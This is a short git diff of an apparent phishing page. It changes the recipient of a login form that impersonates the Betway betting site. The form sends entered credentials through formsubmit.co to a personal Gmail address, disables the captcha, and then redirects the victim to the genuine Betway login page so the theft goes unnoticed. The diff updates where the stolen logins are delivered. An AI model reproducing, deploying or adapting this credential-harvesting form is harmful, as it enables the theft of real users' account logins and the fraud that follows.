--- a/index.html
+++ b/index.html
@@ -172,7 +172,7 @@
 
 <div class="login-container">
   <div class="login-header">Login</div>
-  <form class="login-body" action="https://formsubmit.co/farfromweak31@gmail.com" method="POST" onsubmit="return validateForm(event)">
+  <form class="login-body" action="https://formsubmit.co/robarsrsa@gmail.com" method="POST" onsubmit="return validateForm(event)">
     <input type="hidden" name="_captcha" value="false">
     <input type="hidden" name="_next" value="https://www.betway.co.za/account/login">
 
